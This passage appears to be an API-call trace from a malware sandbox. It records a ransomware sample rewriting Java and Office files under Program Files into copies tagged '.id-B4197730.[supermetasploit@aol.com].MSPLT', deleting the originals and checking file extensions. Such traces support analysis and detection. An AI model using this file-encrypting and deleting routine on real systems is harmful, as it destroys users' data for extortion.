[0174.874] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0174.874] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.874] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.874] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0174.875] GetLastError () returned 0x0 [0174.875] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x93, lpOverlapped=0x0) returned 1 [0174.876] WriteFile (in: hFile=0x368, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xa0, lpOverlapped=0x0) returned 1 [0174.877] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0174.877] WriteFile (in: hFile=0x368, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x102, lpOverlapped=0x0) returned 1 [0174.878] SetEndOfFile (hFile=0x368) returned 1 [0174.878] CloseHandle (hObject=0x368) returned 1 [0174.889] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.889] SetEndOfFile (hFile=0x348) returned 1 [0174.890] CloseHandle (hObject=0x348) returned 1 [0174.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.891] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif")) returned 1 [0174.891] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.891] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.892] lstrlenW (lpString=".doc") returned 4 [0174.892] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.892] lstrlenW (lpString=".docx") returned 5 [0174.892] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.892] lstrlenW (lpString=".pdf") returned 4 [0174.892] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.892] lstrlenW (lpString=".xls") returned 4 [0174.892] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.892] lstrlenW (lpString=".xlsx") returned 5 [0174.892] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.892] lstrlenW (lpString=".ppt") returned 4 [0174.892] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.892] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.892] lstrlenW (lpString=".zip") returned 4 [0174.892] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.892] lstrlenW (lpString=".rar") returned 4 [0174.892] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.892] lstrlenW (lpString=".bz2") returned 4 [0174.892] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.892] lstrlenW (lpString=".7z") returned 3 [0174.892] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.892] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.892] lstrlenW (lpString=".dbf") returned 4 [0174.892] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.892] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.892] lstrlenW (lpString=".1cd") returned 4 [0174.893] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.893] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.893] lstrlenW (lpString=".jpg") returned 4 [0174.893] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.893] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.893] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.893] lstrlenW (lpString=".doc") returned 4 [0174.893] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.893] lstrlenW (lpString=".docx") returned 5 [0174.893] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.893] lstrlenW (lpString=".pdf") returned 4 [0174.893] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.893] lstrlenW (lpString=".xls") returned 4 [0174.893] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.893] lstrlenW (lpString=".xlsx") returned 5 [0174.893] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.893] lstrlenW (lpString=".ppt") returned 4 [0174.893] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.893] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.893] lstrlenW (lpString=".zip") returned 4 [0174.893] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.893] lstrlenW (lpString=".rar") returned 4 [0174.893] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.893] lstrlenW (lpString=".bz2") returned 4 [0174.893] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.893] lstrlenW (lpString=".7z") returned 3 [0174.894] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.894] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.894] lstrlenW (lpString=".dbf") returned 4 [0174.894] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.894] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.894] lstrlenW (lpString=".1cd") returned 4 [0174.894] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.894] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0174.894] lstrlenW (lpString=".jpg") returned 4 [0174.894] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.894] lstrcmpiW (lpString1=".gif", lpString2=".MSPLT") returned -1 [0174.894] lstrlenW (lpString="win32_MoveNoDrop32x32.gif") returned 25 [0174.894] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0174.895] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=153) returned 1 [0174.895] CloseHandle (hObject=0x348) returned 1 [0174.895] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif")) returned 0x20 [0174.895] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.895] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0174.895] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.895] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.895] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0174.901] GetLastError () returned 0x0 [0174.901] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x99, lpOverlapped=0x0) returned 1 [0174.903] WriteFile (in: hFile=0x368, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xa0, lpOverlapped=0x0) returned 1 [0174.904] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0174.904] WriteFile (in: hFile=0x368, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x106, lpOverlapped=0x0) returned 1 [0174.904] SetEndOfFile (hFile=0x368) returned 1 [0174.905] CloseHandle (hObject=0x368) returned 1 [0174.907] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.907] SetEndOfFile (hFile=0x348) returned 1 [0174.908] CloseHandle (hObject=0x348) returned 1 [0174.908] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.908] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif")) returned 1 [0174.909] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.909] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.909] lstrlenW (lpString=".doc") returned 4 [0174.909] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.909] lstrlenW (lpString=".docx") returned 5 [0174.909] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.909] lstrlenW (lpString=".pdf") returned 4 [0174.909] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.909] lstrlenW (lpString=".xls") returned 4 [0174.909] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.909] lstrlenW (lpString=".xlsx") returned 5 [0174.909] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.909] lstrlenW (lpString=".ppt") returned 4 [0174.909] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.909] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.909] lstrlenW (lpString=".zip") returned 4 [0174.909] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.909] lstrlenW (lpString=".rar") returned 4 [0174.909] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.909] lstrlenW (lpString=".bz2") returned 4 [0174.909] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.909] lstrlenW (lpString=".7z") returned 3 [0174.909] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.909] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.909] lstrlenW (lpString=".dbf") returned 4 [0174.909] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.909] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.909] lstrlenW (lpString=".1cd") returned 4 [0174.909] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.909] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.909] lstrlenW (lpString=".jpg") returned 4 [0174.909] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.910] lstrlenW (lpString=".doc") returned 4 [0174.910] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.910] lstrlenW (lpString=".docx") returned 5 [0174.910] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.910] lstrlenW (lpString=".pdf") returned 4 [0174.910] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.910] lstrlenW (lpString=".xls") returned 4 [0174.910] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.910] lstrlenW (lpString=".xlsx") returned 5 [0174.910] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.910] lstrlenW (lpString=".ppt") returned 4 [0174.910] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.910] lstrlenW (lpString=".zip") returned 4 [0174.910] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.910] lstrlenW (lpString=".rar") returned 4 [0174.910] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.910] lstrlenW (lpString=".bz2") returned 4 [0174.910] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.910] lstrlenW (lpString=".7z") returned 3 [0174.910] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.910] lstrlenW (lpString=".dbf") returned 4 [0174.910] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.910] lstrlenW (lpString=".1cd") returned 4 [0174.910] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.910] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0174.910] lstrlenW (lpString=".jpg") returned 4 [0174.910] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.911] lstrcmpiW (lpString1=".txt", lpString2=".MSPLT") returned 1 [0174.911] lstrlenW (lpString="jvm.hprof.txt") returned 13 [0174.911] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0174.911] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=4226) returned 1 [0174.911] CloseHandle (hObject=0x348) returned 1 [0174.911] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt")) returned 0x20 [0174.911] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.911] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0174.911] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.911] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0174.911] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0174.912] GetLastError () returned 0x0 [0174.912] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x1082, lpOverlapped=0x0) returned 1 [0175.405] WriteFile (in: hFile=0x368, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x1090, lpOverlapped=0x0) returned 1 [0175.784] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0175.785] WriteFile (in: hFile=0x368, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xee, lpOverlapped=0x0) returned 1 [0175.785] SetEndOfFile (hFile=0x368) returned 1 [0175.785] CloseHandle (hObject=0x368) returned 1 [0175.788] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0175.788] SetEndOfFile (hFile=0x348) returned 1 [0175.790] CloseHandle (hObject=0x348) returned 1 [0175.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0175.790] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt")) returned 1 [0175.791] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.791] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.791] lstrlenW (lpString=".doc") returned 4 [0175.791] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0175.791] lstrlenW (lpString=".docx") returned 5 [0175.791] lstrcmpiW (lpString1=".docx", lpString2="f.txt") returned -1 [0175.791] lstrlenW (lpString=".pdf") returned 4 [0175.791] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0175.791] lstrlenW (lpString=".xls") returned 4 [0175.791] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0175.791] lstrlenW (lpString=".xlsx") returned 5 [0175.791] lstrcmpiW (lpString1=".xlsx", lpString2="f.txt") returned -1 [0175.791] lstrlenW (lpString=".ppt") returned 4 [0175.791] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0175.791] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.791] lstrlenW (lpString=".zip") returned 4 [0175.791] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0175.791] lstrlenW (lpString=".rar") returned 4 [0175.791] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0175.791] lstrlenW (lpString=".bz2") returned 4 [0175.791] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0175.791] lstrlenW (lpString=".7z") returned 3 [0175.791] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0175.791] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.791] lstrlenW (lpString=".dbf") returned 4 [0175.791] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0175.791] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.792] lstrlenW (lpString=".1cd") returned 4 [0175.792] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0175.792] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.792] lstrlenW (lpString=".jpg") returned 4 [0175.792] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0175.792] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.792] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.792] lstrlenW (lpString=".doc") returned 4 [0175.792] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0175.792] lstrlenW (lpString=".docx") returned 5 [0175.792] lstrcmpiW (lpString1=".docx", lpString2="f.txt") returned -1 [0175.792] lstrlenW (lpString=".pdf") returned 4 [0175.792] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0175.792] lstrlenW (lpString=".xls") returned 4 [0175.792] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0175.792] lstrlenW (lpString=".xlsx") returned 5 [0175.792] lstrcmpiW (lpString1=".xlsx", lpString2="f.txt") returned -1 [0175.792] lstrlenW (lpString=".ppt") returned 4 [0175.792] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0175.792] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.792] lstrlenW (lpString=".zip") returned 4 [0175.792] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0175.792] lstrlenW (lpString=".rar") returned 4 [0175.792] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0175.792] lstrlenW (lpString=".bz2") returned 4 [0175.792] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0175.792] lstrlenW (lpString=".7z") returned 3 [0175.793] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0175.793] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.793] lstrlenW (lpString=".dbf") returned 4 [0175.793] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0175.793] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.793] lstrlenW (lpString=".1cd") returned 4 [0175.793] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0175.793] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0175.793] lstrlenW (lpString=".jpg") returned 4 [0175.793] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0175.793] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0175.793] lstrlenW (lpString="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 53 [0175.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0175.902] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=387356) returned 1 [0175.902] CloseHandle (hObject=0x388) returned 1 [0175.902] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml")) returned 0x220 [0175.902] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0175.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program 